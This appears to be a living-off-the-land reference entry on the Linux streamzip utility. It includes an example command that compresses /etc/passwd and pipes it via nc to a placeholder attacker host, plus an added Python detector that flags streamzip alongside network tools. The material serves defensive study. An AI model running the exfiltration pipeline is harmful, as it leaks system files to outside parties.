streamzip
streamzip is a system utility that compresses data from "stdin" and writes it directly to "stdout"; no temporary files are created. Malicious actors can use the tool to collect and exfiltrate sensitive data without leaving staged archive artifacts on disk.
Author: Gabriel De Jesus (0xv1n)
Created: 2024-07-15
Paths
/usr/bin/streamzip
Example Use Cases
Copy and compress sensitive data locally
The following command reads file data and compresses the data for exfiltration:
dd if=/etc/passwd | streamzip - stream | nc ATTACKER_IP PORT
Detections
- No detection content at time of writing
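One way to approach the gap noted above, as an added example that is not part of the original entry or of the project's detection content: correlate a streamzip execution with a network utility started by the same parent shell within a short window, which is how the stages of a pipeline like the one above appear in process telemetry. The event fields (ts, pid, ppid, path, args), the tool list, the 2-second window and the sample events are assumptions constructed for illustration.

```python
import json
import os

NETWORK_TOOLS = {"nc", "ncat", "socat", "curl", "ssh", "scp"}  # assumed list, tune locally
WINDOW_SECONDS = 2.0  # a shell spawns all stages of a pipeline almost simultaneously

# Constructed sample process-exec events (not real telemetry); field names are assumptions.
SAMPLE_EVENTS = """
{"ts": 100.00, "pid": 501, "ppid": 400, "path": "/bin/dd", "args": ["dd", "if=/etc/passwd"]}
{"ts": 100.01, "pid": 502, "ppid": 400, "path": "/usr/bin/streamzip", "args": ["streamzip", "-", "stream"]}
{"ts": 100.01, "pid": 503, "ppid": 400, "path": "/usr/bin/nc", "args": ["nc", "ATTACKER_IP", "PORT"]}
{"ts": 250.00, "pid": 610, "ppid": 600, "path": "/usr/bin/streamzip", "args": ["streamzip"]}
{"ts": 900.00, "pid": 611, "ppid": 600, "path": "/usr/bin/curl", "args": ["curl", "https://example.com"]}
{"ts": 300.00, "pid": 700, "ppid": 690, "path": "/usr/bin/perl", "args": ["perl", "/usr/bin/streamzip"]}
{"ts": 300.02, "pid": 701, "ppid": 690, "path": "/usr/bin/ssh", "args": ["ssh", "HOST"]}
"""

def is_streamzip(ev):
    # Match the executable itself, or the first arguments in case the telemetry
    # reports an interpreter as the executable and streamzip as its script.
    candidates = [ev["path"], *ev["args"][:2]]
    return any(os.path.basename(c) == "streamzip" for c in candidates)

def find_stream_exfil(lines):
    """Return one alert per streamzip execution, rated by nearby network siblings."""
    events = [json.loads(line) for line in lines.splitlines() if line.strip()]
    alerts = []
    for z in filter(is_streamzip, events):
        peers = [
            e for e in events
            if e["ppid"] == z["ppid"] and e["pid"] != z["pid"]
            and os.path.basename(e["path"]) in NETWORK_TOOLS
            and abs(e["ts"] - z["ts"]) <= WINDOW_SECONDS
        ]
        alerts.append({
            "pid": z["pid"],
            "severity": "high" if peers else "info",  # no network sibling: log only
            "peers": [os.path.basename(p["path"]) for p in peers],
        })
    return alerts

if __name__ == "__main__":
    for alert in find_stream_exfil(SAMPLE_EVENTS):
        print(alert)
```

Because nothing is staged on disk, file-creation monitoring will not see this activity; process lineage and timing are the signals that remain.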